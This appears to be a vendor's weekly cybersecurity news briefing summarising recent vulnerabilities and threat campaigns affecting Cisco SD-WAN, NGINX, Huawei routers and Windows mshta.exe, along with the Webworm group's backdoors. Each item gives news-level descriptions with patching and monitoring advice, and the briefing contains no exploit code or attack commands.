Hybrid Cloud
Cybersecurity
Data & AI
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Banking and Finance
Smart Cities
Public Sector
Cybersecurity Weekly Briefing, 16-22 May
Cisco patches a zero-day vulnerability with a perfect CVSS score of 10.0 exploited by UAT-8616
Cisco has released a patch for CVE-2026-20182 (CVSSv3 10.0 according to Cisco), a critical-severity authentication bypass in Cisco Catalyst SD-WAN Controller and SD-WAN Manager that allows an unauthenticated remote attacker to gain administrative privileges via specially crafted packets against the vdaemon service (UDP 12346). Cisco Talos attributes the exploitation to the UAT-8616 group, the same actor that has been exploiting vulnerabilities in Cisco’s SD-WAN infrastructure since at least 2023 and which previously exploited CVE-2026-20127 (CVSSv3 10.0 according to Cisco).
The group attempted to add SSH keys, modify NETCONF configurations and escalate to root, using infrastructure overlapping with Operational Relay Boxes (ORB) networks. The strategic severity is significant: a compromised SD-WAN controller can redirect traffic, intercept communications and deploy malicious configurations across the entire organisation from a single point of leverage. CISA added CVE-2026-20182 to the KEV with a three-day deadline for federal agencies.
It is recommended to apply the available patches immediately, audit /var/log/auth.log for unauthorised peering connections, and review the indicators of compromise published by Talos.
Public PoC and active exploitation of the critical vulnerability in NGINX
DepthFirst has published a proof-of-concept exploit for CVE-2026-42945 (CVSSv4 9.2 according to F5), a heap buffer overflow in the ngx_http_rewrite module of NGINX, introduced 16 years ago and present in versions 0.6.27 to 1.30.0, which affects configurations with rewrite and set directives. The flaw allows for worker restarts and denial of service, with the possibility of remote code execution if ASLR is disabled. Furthermore, VulnCheck claims to have detected active exploitation following public disclosure, which heightens the operational urgency due to the widespread use of NGINX as a web server and reverse proxy.
NGINX Plus should be updated to the patched branches and NGINX Open Source to 1.31.0 or 1.30.1, prioritising systems exposed to the internet.
Webworm deploys the EchoCreep and GraphWorm backdoors in Europe, including Spain
ESET researchers have documented new activity by the China-aligned threat actor known as Webworm, which in 2025 expanded its arsenal with two bespoke backdoors: EchoCreep, which uses Discord as a command-and-control (C2) channel, and GraphWorm, which employs the Microsoft Graph API for the same functions, storing files on OneDrive. The choice of legitimate services widely permitted on corporate networks, such as Discord and the Graph API, is intended to blend in with normal traffic and evade perimeter network controls.
ESET notes that the group has abandoned the legacy RATs Trochilus and 9002 in favour of custom proxy tools (WormFrp, ChainWorm, SmuxProxy, WormSocket) that support chained encrypted communications across multiple hosts, in combination with SoftEther VPN. Of particular note is the geographical shift: Webworm has stepped up its operations against European government entities in Belgium, Italy, Serbia, Poland and Spain, shifting its focus away from its traditional targets in Central Asia and Russia.
The initial access vector is unknown, although the group uses open-source tools such as dirsearch and nuclei for web server reconnaissance.
A 0-day vulnerability in Huawei routers, with no CVE or public patch, caused Luxembourg’s telecommunications network to collapse
According to a report by The Record, an unknown vulnerability in Huawei’s VRP operating system was exploited in July 2025 to bring down Luxembourg’s entire telecommunications network for more than three hours, including mobile and fixed-line emergency services. The attack involved specially crafted network traffic that forced the routers of POST Luxembourg, the state-owned operator, into a continuous reboot loop, bringing down critical infrastructure.
Most alarmingly, ten months on, the flaw still has no public CVE, no formal warning has been issued to other operators, and there are doubts as to whether a definitive patch exists: Huawei did not respond to journalists’ questions. The Luxembourg authorities alerted European partners via confidential government channels, but the global technical community has received no notification. Although the authorities found no evidence of an attack specifically targeting POST, the incident highlights the systemic risk posed by undisclosed vulnerabilities in network equipment deployed on a massive scale by telecoms operators worldwide.
Operators using Huawei equipment are advised to check the manufacturer’s support channels for restricted security advisories and to enable monitoring for anomalous behaviour at the control plane of their routers.
The misuse of MSHTA triggers LOLBIN-based malware campaigns on Windows
Bitdefender researchers warn of a significant increase in the use of mshta.exe, a legacy Windows utility, as an execution vector for fileless infection chains. This binary, present by default on Windows systems, allows HTA scripts to be executed and is being widely used to deploy stealers such as LummaStealer, loaders such as CountLoader and persistent threats such as PurpleFox.
The attacks combine phishing, pirated software and techniques such as ClickFix to achieve in-memory command execution and deploy payloads without leaving a trace on disk, making detection by EDR difficult. The scale of the abuse, ranging from mass campaigns to advanced intrusions, demonstrates the persistence of the Living-off-the-Land model.
It is recommended to restrict or block MSHTA in environments where it is not required, as well as to strengthen controls over PowerShell and scripts.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
